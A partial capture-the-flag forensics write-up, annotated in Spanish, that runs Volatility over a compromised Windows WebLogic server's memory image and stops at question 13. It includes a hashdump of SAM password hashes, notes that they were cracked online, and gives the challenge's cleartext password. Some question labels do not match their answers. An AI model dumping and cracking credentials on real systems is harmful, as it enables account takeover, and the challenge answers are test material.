Scenario
The #NSM gear flagged suspicious traffic coming from one of the organization’s web servers. Analyze the server’s captured memory image and figure out what happened.
Tools
#1 Respuesta: 5b3b1e1c92ddb1c128eca0fa8c917c16c275ad4c95b19915a288a745f9960f39
What is the SHA256 hash value of the RAM image?
Obtención de la evidencia
sha256sum memory.mem
5b3b1e1c92ddb1c128eca0fa8c917c16c275ad4c95b19915a288a745f9960f39 memory.mem
#2 Respuesta: 2021-08-06 16:13:23
What time was the RAM image acquired according to the suspect system? (YYYY-MM-DD HH:MM:SS)
Obtención de la evidencia
vol.py -f memory.mem imageinfo
Volatility Foundation Volatility Framework 2.6.1
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win10x64_17134, Win10x64_14393, Win10x64_10586, Win10x64_16299, Win2016x64_14393, Win10x64_17763, Win10x64_15063 (Instantiated with Win10x64_15063)
AS Layer1 : SkipDuplicatesAMD64PagedMemory (Kernel AS)
AS Layer2 : FileAddressSpace (/opt/CTF/blueteam/BSidesJeddah-Part2/memory.mem)
PAE type : No PAE
DTB : 0x1ab000L
KDBG : 0xf8024b96a500L
Number of Processors : 4
Image Type (Service Pack) : 0
KPCR for CPU 0 : 0xfffff8024b9bc000L
KPCR for CPU 1 : 0xffffa601d4e00000L
KPCR for CPU 2 : 0xffffa601d4c40000L
KPCR for CPU 3 : 0xffffa601d4cc3000L
KUSER_SHARED_DATA : 0xfffff78000000000L
Image date and time : 2021-08-06 16:13:23 UTC+0000
Image local date and time : 2021-08-06 09:13:23 -0700
#3 Respuesta: WIN-8QOTRH7EMHC
What volatility2 profile is the most appropriate for this machine. imageinfo will take a long try to figure another way to determine the profile? (ex: Win10x86_14393)
Obtención de la evidencia
vol.py -f memory.mem --profile=Win2016x64_14393 hivelist
Volatility Foundation Volatility Framework 2.6.1
Virtual Physical Name
------------------ ------------------ ----
0xffff808fe8767000 0x0000000106c43000 \??\C:\Windows\AppCompat\Programs\Amcache.hve
0xffff808ff03fe000 0x000000012adea000 \??\C:\Users\Administrator\ntuser.dat
0xffff808ff07dc000 0x000000012deab000 \??\C:\Users\Administrator\AppData\Local\Microsoft\Windows\UsrClass.dat
0xffff808ff15b6000 0x000000013357e000 \??\C:\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ShellExperienceHost_10.0.14393.693_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat
0xffff808ff1273000 0x000000012ad3f000 \??\C:\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat
0xffff808ff130f000 0x0000000134c1a000 \??\C:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat
0xffff808ff133d000 0x0000000134e4d000 \??\C:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat
0xffff808fe7e35000 0x00000001f28f7000 [no name]
0xffff808fe7e41000 0x0000000000404000 \REGISTRY\MACHINE\SYSTEM
0xffff808fe7e85000 0x0000000000f98000 \REGISTRY\MACHINE\HARDWARE
0xffff808fe9f1a000 0x000000000241b000 \Device\HarddiskVolume2\EFI\Microsoft\Boot\BCD
0xffff808fe858e000 0x000000000f660000 \SystemRoot\System32\Config\SOFTWARE
0xffff808fe88f6000 0x0000000002035000 \SystemRoot\System32\Config\DEFAULT
0xffff808fef18f000 0x000000010b15e000 \SystemRoot\System32\Config\SECURITY
0xffff808fef172000 0x000000010b965000 \SystemRoot\System32\Config\SAM
0xffff808fef20f000 0x000000010bf5c000 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
0xffff808fef342000 0x000000010d54d000 \SystemRoot\System32\Config\BBI
0xffff808fef358000 0x000000010d574000 \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT
vol.py -f memory.mem --profile=Win2016x64_14393 printkey -o 0xffff808fe7e41000 -K 'ControlSet001\Control\ComputerName\ComputerName'
Volatility Foundation Volatility Framework 2.6.1
Legend: (S) = Stable (V) = Volatile
----------------------------
Registry: \REGISTRY\MACHINE\SYSTEM
Key name: ComputerName (S)
Last updated: 2021-08-05 13:55:52 UTC+0000
Subkeys:
Values:
REG_SZ : (S) mnmsrvc
REG_SZ ComputerName : (S) WIN-8QOTRH7EMHC
Más información
#5 Respuesta: 192.168.144.131
What is the system IP address?
Obtención de la evidencia
vol.py -f memory.mem --profile=Win2016x64_14393 netscan
Volatility Foundation Volatility Framework 2.6.1
Offset(P) Proto Local Address Foreign Address State Pid Owner Created
0xb68cb0766d40 UDPv6 ::1:1900 *:* 3176 svchost.exe 2021-08-06 15:27:19 UTC+0000
0xb68cb079bbd0 UDPv6 ::1:60614 *:* 3176 svchost.exe 2021-08-06 15:27:19 UTC+0000
0xb68cb0a9fec0 UDPv4 0.0.0.0:0 *:* 4344 powershell.exe 2021-08-06 15:54:58 UTC+0000
0xb68cb05a9300 TCPv4 0.0.0.0:49668 0.0.0.0:0 LISTENING 1592 spoolsv.exe 2021-08-06 15:26:34 UTC+0000
0xb68cb05a9300 TCPv6 :::49668 :::0 LISTENING 1592 spoolsv.exe 2021-08-06 15:26:34 UTC+0000
0xb68cb0751010 TCPv4 192.168.144.131:80 0.0.0.0:0 LISTENING 508 svchost.exe 2021-08-06 15:26:45 UTC+0000
0xb68cb0f05350 UDPv4 192.168.144.131:138 *:* 4 System 2021-08-06 15:26:24 UTC+0000
0xb68cb1254ec0 TCPv4 0.0.0.0:135 0.0.0.0:0 LISTENING 824 svchost.exe 2021-08-06 15:26:17 UTC+0000
0xb68cb1ed8ec0 UDPv4 0.0.0.0:0 *:* 2136 svchost.exe 2021-08-06 15:26:41 UTC+0000
0xb68cb1ed8ec0 UDPv6 :::0 *:* 2136 svchost.exe 2021-08-06 15:26:41 UTC+0000
0xb68cb1f099e0 UDPv4 192.168.144.131:137 *:* 4 System 2021-08-06 15:26:24 UTC+0000
0xb68cb1cd12f0 TCPv4 0.0.0.0:135 0.0.0.0:0 LISTENING 824 svchost.exe 2021-08-06 15:26:17 UTC+0000
0xb68cb1cd12f0 TCPv6 :::135 :::0 LISTENING 824 svchost.exe 2021-08-06 15:26:17 UTC+0000
0xb68cb1e278a0 TCPv4 0.0.0.0:49664 0.0.0.0:0 LISTENING 568 wininit.exe 2021-08-06 15:26:17 UTC+0000
0xb68cb1e278a0 TCPv6 :::49664 :::0 LISTENING 568 wininit.exe 2021-08-06 15:26:17 UTC+0000
0xb68cb1ec97a0 TCPv4 192.168.144.131:139 0.0.0.0:0 LISTENING 4 System 2021-08-06 15:26:24 UTC+0000
0xb68cb1fc0dc0 TCPv4 0.0.0.0:49664 0.0.0.0:0 LISTENING 568 wininit.exe 2021-08-06 15:26:17 UTC+0000
0xb68cb1f6e740 TCPv4 127.0.0.1:49676 127.0.0.1:49675 ESTABLISHED 4752 java.exe 2021-08-06 15:30:28 UTC+0000
0xb68cb22479f0 UDPv4 192.168.144.131:60615 *:* 3176 svchost.exe 2021-08-06 15:27:19 UTC+0000
0xb68cb22a9430 UDPv4 127.0.0.1:60616 *:* 3176 svchost.exe 2021-08-06 15:27:19 UTC+0000
0xb68cb22a9ec0 UDPv6 fe80::5caf:aaae:b035:834d:60613 *:* 3176 svchost.exe 2021-08-06 15:27:19 UTC+0000
0xb68cb230b010 UDPv4 0.0.0.0:5353 *:* 1100 svchost.exe 2021-08-06 15:26:55 UTC+0000
0xb68cb2315dd0 UDPv4 127.0.0.1:1900 *:* 3176 svchost.exe 2021-08-06 15:27:19 UTC+0000
0xb68cb231f480 UDPv4 192.168.144.131:1900 *:* 3176 svchost.exe 2021-08-06 15:27:19 UTC+0000
0xb68cb23b3aa0 UDPv4 0.0.0.0:5050 *:* 400 svchost.exe 2021-08-06 15:28:56 UTC+0000
0xb68cb2404540 UDPv4 0.0.0.0:0 *:* 400 svchost.exe 2021-08-06 15:26:34 UTC+0000
0xb68cb2405ec0 UDPv4 0.0.0.0:0 *:* 400 svchost.exe 2021-08-06 15:26:34 UTC+0000
0xb68cb2405ec0 UDPv6 :::0 *:* 400 svchost.exe 2021-08-06 15:26:34 UTC+0000
0xb68cb2421b30 UDPv4 0.0.0.0:123 *:* 400 svchost.exe 2021-08-06 15:26:55 UTC+0000
0xb68cb24444e0 UDPv4 0.0.0.0:0 *:* 508 svchost.exe 2021-08-06 15:26:41 UTC+0000
0xb68cb24444e0 UDPv6 :::0 *:* 508 svchost.exe 2021-08-06 15:26:41 UTC+0000
0xb68cb246dd50 UDPv4 0.0.0.0:0 *:* 1100 svchost.exe 2021-08-06 15:26:55 UTC+0000
0xb68cb246dd50 UDPv6 :::0 *:* 1100 svchost.exe 2021-08-06 15:26:55 UTC+0000
0xb68cb24b8540 UDPv4 0.0.0.0:0 *:* 508 svchost.exe 2021-08-06 15:26:38 UTC+0000
0xb68cb24ba010 UDPv4 0.0.0.0:500 *:* 508 svchost.exe 2021-08-06 15:26:38 UTC+0000
0xb68cb26dbad0 UDPv4 0.0.0.0:5353 *:* 1100 svchost.exe 2021-08-06 15:26:55 UTC+0000
0xb68cb26dbad0 UDPv6 :::5353 *:* 1100 svchost.exe 2021-08-06 15:26:55 UTC+0000
0xb68cb27f2d80 UDPv4 0.0.0.0:0 *:* 2136 svchost.exe 2021-08-06 15:26:41 UTC+0000
0xb68cb28a88a0 UDPv4 0.0.0.0:4500 *:* 508 svchost.exe 2021-08-06 15:26:38 UTC+0000
0xb68cb28a88a0 UDPv6 :::4500 *:* 508 svchost.exe 2021-08-06 15:26:38 UTC+0000
0xb68cb28a8ec0 UDPv4 0.0.0.0:500 *:* 508 svchost.exe 2021-08-06 15:26:38 UTC+0000
0xb68cb28a8ec0 UDPv6 :::500 *:* 508 svchost.exe 2021-08-06 15:26:38 UTC+0000
0xb68cb28aad30 UDPv4 0.0.0.0:4500 *:* 508 svchost.exe 2021-08-06 15:26:38 UTC+0000
0xb68cb29366a0 UDPv4 0.0.0.0:123 *:* 400 svchost.exe 2021-08-06 15:26:55 UTC+0000
0xb68cb29366a0 UDPv6 :::123 *:* 400 svchost.exe 2021-08-06 15:26:55 UTC+0000
0xb68cb2b74860 UDPv6 fe80::5caf:aaae:b035:834d:1900 *:* 3176 svchost.exe 2021-08-06 15:27:19 UTC+0000
0xb68cb2344cf0 TCPv4 0.0.0.0:49669 0.0.0.0:0 LISTENING 652 services.exe 2021-08-06 15:26:56 UTC+0000
0xb68cb2344cf0 TCPv6 :::49669 :::0 LISTENING 652 services.exe 2021-08-06 15:26:56 UTC+0000
0xb68cb2352330 TCPv4 0.0.0.0:49669 0.0.0.0:0 LISTENING 652 services.exe 2021-08-06 15:26:56 UTC+0000
0xb68cb24aeec0 TCPv4 0.0.0.0:445 0.0.0.0:0 LISTENING 4 System 2021-08-06 15:26:38 UTC+0000
0xb68cb24aeec0 TCPv6 :::445 :::0 LISTENING 4 System 2021-08-06 15:26:38 UTC+0000
0xb68cb24e88f0 TCPv4 0.0.0.0:47001 0.0.0.0:0 LISTENING 4 System 2021-08-06 15:26:39 UTC+0000
0xb68cb24e88f0 TCPv6 :::47001 :::0 LISTENING 4 System 2021-08-06 15:26:39 UTC+0000
0xb68cb24ff8f0 TCPv4 0.0.0.0:5985 0.0.0.0:0 LISTENING 4 System 2021-08-06 15:26:39 UTC+0000
0xb68cb24ff8f0 TCPv6 :::5985 :::0 LISTENING 4 System 2021-08-06 15:26:39 UTC+0000
0xb68cb26862d0 TCPv4 0.0.0.0:49668 0.0.0.0:0 LISTENING 1592 spoolsv.exe 2021-08-06 15:26:34 UTC+0000
0xb68cb268ca30 TCPv4 0.0.0.0:49665 0.0.0.0:0 LISTENING 996 svchost.exe 2021-08-06 15:26:22 UTC+0000
0xb68cb268ca30 TCPv6 :::49665 :::0 LISTENING 996 svchost.exe 2021-08-06 15:26:22 UTC+0000
0xb68cb268e9c0 TCPv4 0.0.0.0:49665 0.0.0.0:0 LISTENING 996 svchost.exe 2021-08-06 15:26:22 UTC+0000
0xb68cb26cdcf0 TCPv4 0.0.0.0:49666 0.0.0.0:0 LISTENING 664 lsass.exe 2021-08-06 15:26:26 UTC+0000
0xb68cb26cdcf0 TCPv6 :::49666 :::0 LISTENING 664 lsass.exe 2021-08-06 15:26:26 UTC+0000
0xb68cb271e340 TCPv4 0.0.0.0:49666 0.0.0.0:0 LISTENING 664 lsass.exe 2021-08-06 15:26:26 UTC+0000
0xb68cb28323e0 TCPv4 0.0.0.0:49667 0.0.0.0:0 LISTENING 508 svchost.exe 2021-08-06 15:26:31 UTC+0000
0xb68cb28323e0 TCPv6 :::49667 :::0 LISTENING 508 svchost.exe 2021-08-06 15:26:31 UTC+0000
0xb68cb2867460 TCPv4 0.0.0.0:49667 0.0.0.0:0 LISTENING 508 svchost.exe 2021-08-06 15:26:31 UTC+0000
0xb68cb2a89010 TCPv4 127.0.0.1:49678 127.0.0.1:49677 ESTABLISHED 4752 java.exe 2021-08-06 15:30:28 UTC+0000
0xb68cb2b50010 TCPv4 127.0.0.1:49675 127.0.0.1:49676 ESTABLISHED 4752 java.exe 2021-08-06 15:30:28 UTC+0000
0xb68cb3236b90 UDPv4 0.0.0.0:0 *:* 4344 powershell.exe 2021-08-06 15:54:58 UTC+0000
0xb68cb3236b90 UDPv6 :::0 *:* 4344 powershell.exe 2021-08-06 15:54:58 UTC+0000
0xb68cb335c260 UDPv4 0.0.0.0:0 *:* 4344 powershell.exe 2021-08-06 15:54:58 UTC+0000
0xb68cb2c58a50 TCPv6 7f00:1::98b0:6cb1:8cb6:ffff:7001 :::0 LISTENING 4752 java.exe 2021-08-06 15:31:00 UTC+0000
0xb68cb2cffb20 TCPv6 c0a8:9083::c8e0:70b2:8cb6:ffff:5556 :::0 LISTENING 4456 java.exe 2021-08-06 15:30:03 UTC+0000
0xb68cb2cffc70 TCPv6 7f00:1::98b0:6cb1:8cb6:ffff:1527 :::0 LISTENING 4772 java.exe 2021-08-06 15:30:07 UTC+0000
0xb68cb2e57ec0 TCPv6 c0a8:9083::c8e0:70b2:8cb6:ffff:7001 :::0 LISTENING 4752 java.exe 2021-08-06 15:31:00 UTC+0000
0xb68cb3266780 TCPv6 2001::2851:782c:d2:133b:3f57:6f7c:7001 :::0 LISTENING 4752 java.exe 2021-08-06 15:31:00 UTC+0000
0xb68cb32ba4f0 TCPv6 ::1:7001 :::0 LISTENING 4752 java.exe 2021-08-06 15:31:01 UTC+0000
0xb68cb2cc8580 TCPv4 127.0.0.1:49680 127.0.0.1:49679 ESTABLISHED 4752 java.exe 2021-08-06 15:30:28 UTC+0000
0xb68cb2ccc010 TCPv4 127.0.0.1:49679 127.0.0.1:49680 ESTABLISHED 4752 java.exe 2021-08-06 15:30:28 UTC+0000
0xb68cb2e135c0 TCPv4 127.0.0.1:49686 127.0.0.1:49687 ESTABLISHED 4752 java.exe 2021-08-06 15:30:39 UTC+0000
0xb68cb2f2eb70 TCPv4 192.168.144.131:49674 51.103.5.186:443 ESTABLISHED 2676 explorer.exe 2021-08-06 15:29:22 UTC+0000
0xb68cb31c6380 TCPv4 127.0.0.1:49682 127.0.0.1:49681 ESTABLISHED 4752 java.exe 2021-08-06 15:30:28 UTC+0000
0xb68cb31c7010 TCPv4 127.0.0.1:49681 127.0.0.1:49682 ESTABLISHED 4752 java.exe 2021-08-06 15:30:28 UTC+0000
0xb68cb31e5010 TCPv4 127.0.0.1:49687 127.0.0.1:49686 ESTABLISHED 4752 java.exe 2021-08-06 15:30:39 UTC+0000
0xb68cb31f0d00 TCPv4 127.0.0.1:49677 127.0.0.1:49678 ESTABLISHED 4752 java.exe 2021-08-06 15:30:28 UTC+0000
0xb68cb3237830 TCPv4 192.168.144.131:49869 192.168.144.129:1339 CLOSE_WAIT 4344 powershell.exe 2021-08-06 15:51:40 UTC+0000
0xb68cb33b4d00 TCPv4 192.168.144.131:80 192.168.144.1:27919 CLOSED 508 svchost.exe 2021-08-06 15:51:39 UTC+0000
0xb68cb346d370 TCPv4 192.168.144.131:49903 192.168.144.129:1337 CLOSED 1488 svchost.exe 2021-08-06 16:17:52 UTC+0000
0xb68cb34faa40 TCPv4 192.168.144.131:49901 192.168.144.129:1337 CLOSED 1488 svchost.exe 2021-08-06 16:15:52 UTC+0000
0xb68cb350dab0 TCPv4 192.168.144.131:49907 192.168.144.129:1337 CLOSE_WAIT 1488 svchost.exe 2021-08-06 16:21:53 UTC+0000
0xb68cb3578ec0 UDPv4 0.0.0.0:5355 *:* 1100 svchost.exe 2021-08-06 16:11:24 UTC+0000
0xb68cb380eec0 UDPv4 0.0.0.0:0 *:* 4344 powershell.exe 2021-08-06 15:54:58 UTC+0000
0xb68cb380eec0 UDPv6 :::0 *:* 4344 powershell.exe 2021-08-06 15:54:58 UTC+0000
0xb68cb3832260 UDPv4 0.0.0.0:5355 *:* 1100 svchost.exe 2021-08-06 16:11:24 UTC+0000
0xb68cb3832260 UDPv6 :::5355 *:* 1100 svchost.exe 2021-08-06 16:11:24 UTC+0000
0xb68cb385e2e0 TCPv4 192.168.144.131:49905 192.168.144.129:1337 CLOSED 1488 svchost.exe 2021-08-06 16:19:53 UTC+0000
0xe000001a9300 TCPv4 0.0.0.0:49668 0.0.0.0:0 LISTENING 1592 spoolsv.exe 2021-08-06 15:26:34 UTC+0000
0xe000001a9300 TCPv6 :::49668 :::0 LISTENING 1592 spoolsv.exe 2021-08-06 15:26:34 UTC+0000
0xf8024bf34ec0 UDPv4 0.0.0.0:0 *:* 4344 powershell.exe 2021-08-06 15:54:58 UTC+0000
0xf8024bdf2ec0 TCPv6 c0a8:9083::c8e0:70b2:8cb6:ffff:7001 :::0 LISTENING 4752 java.exe 2021-08-06 15:31:00 UTC+0000
0xf8024be475c0 TCPv4 127.0.0.1:49686 127.0.0.1:49687 ESTABLISHED 4752 java.exe 2021-08-06 15:30:39 UTC+0000
#5 Respuesta: 12
What is the system IP address?
Obtención de la evidencia
vol.py -f memory.mem --profile=Win2016x64_14393 netscan | grep ESTABLISHED | wc -l
Volatility Foundation Volatility Framework 2.6.1
12
#7 Respuesta: 2676
What is the PID of explorer.exe?
Obtención de la evidencia
vol.py -f memory.mem --profile=Win2016x64_14393 pslist | grep explorer
Volatility Foundation Volatility Framework 2.6.1
0xffffb68cb2d36800 explorer.exe 2676 1140 50 0 1 0 2021-08-06 15:29:16 UTC+0000
#8 Respuesta: Google News
What is the title of the webpage the admin visited using IE?
Obtención de la evidencia
vol.py -f memory.mem --profile=Win2016x64_14393 iehistory
Volatility Foundation Volatility Framework 2.6.1
**************************************************
Process: 2676 explorer.exe
Cache type "DEST" at 0x629d939
Last modified: 2021-08-06 08:39:52 UTC+0000
Last accessed: 2021-08-06 15:39:52 UTC+0000
URL: Administrator@https://news.google.com/topstories?hl=en-US&gl=US&ceid=US:en
Title: Google News
Más información
- HowTo: Scan for Internet Cache/History and URLs
- Volatility, my own cheatsheet (Part 3): Process Memory
- Volatility Examples
#9 Respuesta: Belkasoft
What company developed the program used for memory acquisition?
Obtención de la evidencia
vol.py -f memory.mem --profile=Win2016x64_14393 cmdline
Volatility Foundation Volatility Framework 2.6.1
************************************************************************
System pid: 4
************************************************************************
smss.exe pid: 292
Command line : \SystemRoot\System32\smss.exe
************************************************************************
csrss.exe pid: 412
Command line : %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
************************************************************************
smss.exe pid: 504
************************************************************************
csrss.exe pid: 512
Command line : %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
************************************************************************
winlogon.exe pid: 560
Command line : winlogon.exe
************************************************************************
wininit.exe pid: 568
Command line : wininit.exe
************************************************************************
services.exe pid: 652
Command line : C:\Windows\system32\services.exe
************************************************************************
lsass.exe pid: 664
Command line : C:\Windows\system32\lsass.exe
************************************************************************
svchost.exe pid: 764
Command line : C:\Windows\system32\svchost.exe -k DcomLaunch
************************************************************************
svchost.exe pid: 824
Command line : C:\Windows\system32\svchost.exe -k RPCSS
************************************************************************
dwm.exe pid: 912
Command line : "dwm.exe"
************************************************************************
svchost.exe pid: 972
Command line : C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
************************************************************************
svchost.exe pid: 996
Command line : C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
************************************************************************
svchost.exe pid: 508
Command line : C:\Windows\system32\svchost.exe -k netsvcs
************************************************************************
svchost.exe pid: 400
Command line : C:\Windows\system32\svchost.exe -k LocalService
************************************************************************
svchost.exe pid: 944
Command line : C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
************************************************************************
svchost.exe pid: 1092
Command line : C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
************************************************************************
svchost.exe pid: 1100
Command line : C:\Windows\system32\svchost.exe -k NetworkService
************************************************************************
spoolsv.exe pid: 1592
Command line : C:\Windows\System32\spoolsv.exe
************************************************************************
svchost.exe pid: 1668
Command line : C:\Windows\System32\svchost.exe -k utcsvc
************************************************************************
svchost.exe pid: 1732
Command line : C:\Windows\System32\svchost.exe -k smbsvcs
************************************************************************
svchost.exe pid: 1764
Command line : C:\Windows\system32\svchost.exe -k appmodel
************************************************************************
wlms.exe pid: 1852
Command line : C:\Windows\system32\wlms\wlms.exe
************************************************************************
MsMpEng.exe pid: 1876
Command line : "C:\Program Files\Windows Defender\MsMpEng.exe"
************************************************************************
vm3dservice.ex pid: 1896
Command line : C:\Windows\system32\vm3dservice.exe
************************************************************************
vmtoolsd.exe pid: 1904
Command line : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
************************************************************************
VGAuthService. pid: 1912
Command line : "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"
************************************************************************
vm3dservice.ex pid: 892
Command line : vm3dservice.exe -n
************************************************************************
svchost.exe pid: 2136
Command line : C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
************************************************************************
dllhost.exe pid: 2812
Command line : C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
************************************************************************
msdtc.exe pid: 2912
Command line : C:\Windows\System32\msdtc.exe
************************************************************************
WmiPrvSE.exe pid: 3004
Command line : C:\Windows\system32\wbem\wmiprvse.exe
************************************************************************
WmiPrvSE.exe pid: 2560
Command line : C:\Windows\system32\wbem\wmiprvse.exe
************************************************************************
svchost.exe pid: 3176
Command line : C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
************************************************************************
RuntimeBroker. pid: 4064
Command line : C:\Windows\System32\RuntimeBroker.exe -Embedding
************************************************************************
sihost.exe pid: 2196
Command line : sihost.exe
************************************************************************
svchost.exe pid: 2756
Command line : C:\Windows\system32\svchost.exe -k UnistackSvcGroup
************************************************************************
taskhostw.exe pid: 2424
Command line : taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
************************************************************************
userinit.exe pid: 1140
************************************************************************
explorer.exe pid: 2676
Command line : C:\Windows\Explorer.EXE
************************************************************************
ShellExperienc pid: 3496
Command line : "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
************************************************************************
SearchUI.exe pid: 3408
Command line : "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
************************************************************************
ServerManager. pid: 2552
Command line : "C:\Windows\system32\ServerManager.exe"
************************************************************************
vmtoolsd.exe pid: 3732
Command line : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
************************************************************************
jusched.exe pid: 4172
Command line : "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
************************************************************************
cmd.exe pid: 4356
Command line : "C:\Windows\System32\cmd.exe" /C "C:\Users\Administrator\Desktop\wls1411\user_projects\domains\base_domain\bin\startNodeManager.cmd"
************************************************************************
conhost.exe pid: 4364
Command line : \??\C:\Windows\system32\conhost.exe 0x4
************************************************************************
java.exe pid: 4456
Command line :
************************************************************************
cmd.exe pid: 4556
Command line : "C:\Windows\System32\cmd.exe" /C "C:\Users\Administrator\Desktop\wls1411\user_projects\domains\base_domain\bin\startWebLogic.cmd"
************************************************************************
conhost.exe pid: 4564
Command line : \??\C:\Windows\system32\conhost.exe 0x4
************************************************************************
cmd.exe pid: 4736
Command line : cmd /c "C:\Users\Administrator\Desktop\wls1411\wlserver\common\derby\bin\startNetworkServer.bat "
************************************************************************
java.exe pid: 4752
Command line :
************************************************************************
java.exe pid: 4772
Command line :
************************************************************************
jucheck.exe pid: 1392
Command line : "C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe" -auto
************************************************************************
fontdrvhost.ex pid: 2824
Command line : "fontdrvhost.exe"
************************************************************************
armsvc.exe pid: 840
Command line : "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
************************************************************************
powershell.exe pid: 4344
Command line :
************************************************************************
conhost.exe pid: 4636
Command line : \??\C:\Windows\system32\conhost.exe 0x4
************************************************************************
powershell.exe pid: 4200
************************************************************************
powershell.exe pid: 2712
************************************************************************
powershell.exe pid: 2132
************************************************************************
powershell.exe pid: 4264
************************************************************************
powershell.exe pid: 3684
************************************************************************
powershell.exe pid: 3676
************************************************************************
powershell.exe pid: 3520
************************************************************************
powershell.exe pid: 1012
************************************************************************
powershell.exe pid: 2200
************************************************************************
powershell.exe pid: 776
************************************************************************
powershell.exe pid: 1616
************************************************************************
mmc.exe pid: 2688
Command line : "C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s
************************************************************************
svchost.exe pid: 1488
Command line : "C:\Users\Administrator\Desktop\svchost.exe"
************************************************************************
notepad.exe pid: 4596
Command line : "C:\Windows\System32\notepad.exe" exfiltrator.txt
************************************************************************
RamCapture64.e pid: 2568
Command line : "C:\Users\Administrator\Desktop\RamCapturer\x64\RamCapture64.exe"
************************************************************************
conhost.exe pid: 3524
Command line : \??\C:\Windows\system32\conhost.exe 0x4
#10 Respuesta: 52(dumbledore)oxim
What is the administrator user password?
Obtención de la evidencia
En primer lugar estaba empleando volatility 2 para realizar el reto pero a la hora de intentar resolver esta pregunta obtenía un hash el cual no podía obtener la contraseña.
Por lo tanto me descargue volatility 3 y obtuve el hash correcto.
python3 volatility3/vol.py -f memory.mem windows.hashdump
Volatility 3 Framework 2.0.2
Progress: 100.00 PDB scanning finished
User rid lmhash nthash
Administrator 500 aad3b435b51404eeaad3b435b51404ee 3aff70b832f6170bda6f7b641563f60b
Guest 501 aad3b435b51404eeaad3b435b51404ee 31d6cfe0d16ae931b73c59d7e0c089c0
DefaultAccount 503 aad3b435b51404eeaad3b435b51404ee 31d6cfe0d16ae931b73c59d7e0c089c0
Para obtener la contraseña utilice https://crackstation.net/
# 11 Respuesta: 14.1.1.0.0
What is the version of the WebLogic server installed on the system?
Obtención de la evidencia
No encontré evidencia de la versión de weblogic hasta, cuando resolví la pregunta #16 encontré las versiones afectadas de Weblogic
#12 Respuesta: 80:7001
The admin set a port forward rule to redirect the traffic from the public port to the WebLogic admin portal port. What is the public and WebLogic admin portal port number? Format PublicPort:WebLogicPort (22:1337)
Obtención de la evidencia
En primer lugar filtramos por las conexiones escuchando y por la ip del servidor (192.168.144.131) en el cual podemos identificar un puerto 80
vol.py -f memory.mem --profile=Win2016x64_14393 netscan | grep LISTENING | grep 192.168.144.131
Volatility Foundation Volatility Framework 2.6.1
0xb68cb0751010 TCPv4 192.168.144.131:80 0.0.0.0:0 LISTENING 508 svchost.exe 2021-08-06 15:26:45 UTC+0000
0xb68cb1ec97a0 TCPv4 192.168.144.131:139 0.0.0.0:0 LISTENING 4 System 2021-08-06 15:26:24 UTC+000
De la misma forma, filtramos por el proceso de WebLogic en donde podemos identificar el puerto 7001
vol.py -f memory.mem --profile=Win2016x64_14393 netscan | grep LISTENING | grep java
Volatility Foundation Volatility Framework 2.6.1
0xb68cb2c58a50 TCPv6 7f00:1::98b0:6cb1:8cb6:ffff:7001 :::0 LISTENING 4752 java.exe 2021-08-06 15:31:00 UTC+0000
0xb68cb2cffb20 TCPv6 c0a8:9083::c8e0:70b2:8cb6:ffff:5556 :::0 LISTENING 4456 java.exe 2021-08-06 15:30:03 UTC+0000
0xb68cb2cffc70 TCPv6 7f00:1::98b0:6cb1:8cb6:ffff:1527 :::0 LISTENING 4772 java.exe 2021-08-06 15:30:07 UTC+0000
0xb68cb2e57ec0 TCPv6 c0a8:9083::c8e0:70b2:8cb6:ffff:7001 :::0 LISTENING 4752 java.exe 2021-08-06 15:31:00 UTC+0000
0xb68cb3266780 TCPv6 2001::2851:782c:d2:133b:3f57:6f7c:7001 :::0 LISTENING 4752 java.exe 2021-08-06 15:31:00 UTC+0000
0xb68cb32ba4f0 TCPv6 ::1:7001 :::0 LISTENING 4752 java.exe 2021-08-06 15:31:01 UTC+0000
0xf8024bdf2ec0 TCPv6 c0a8:9083::c8e0:70b2:8cb6:ffff:7001 :::0 LISTENING 4752 java.exe 2021-08-06 15:31:00 UTC+000
#13 Respuesta: 4752
The attacker gain access through WebLogic Server. What is the PID of the process responsible for the initial exploit?
Obtención de la evidencia
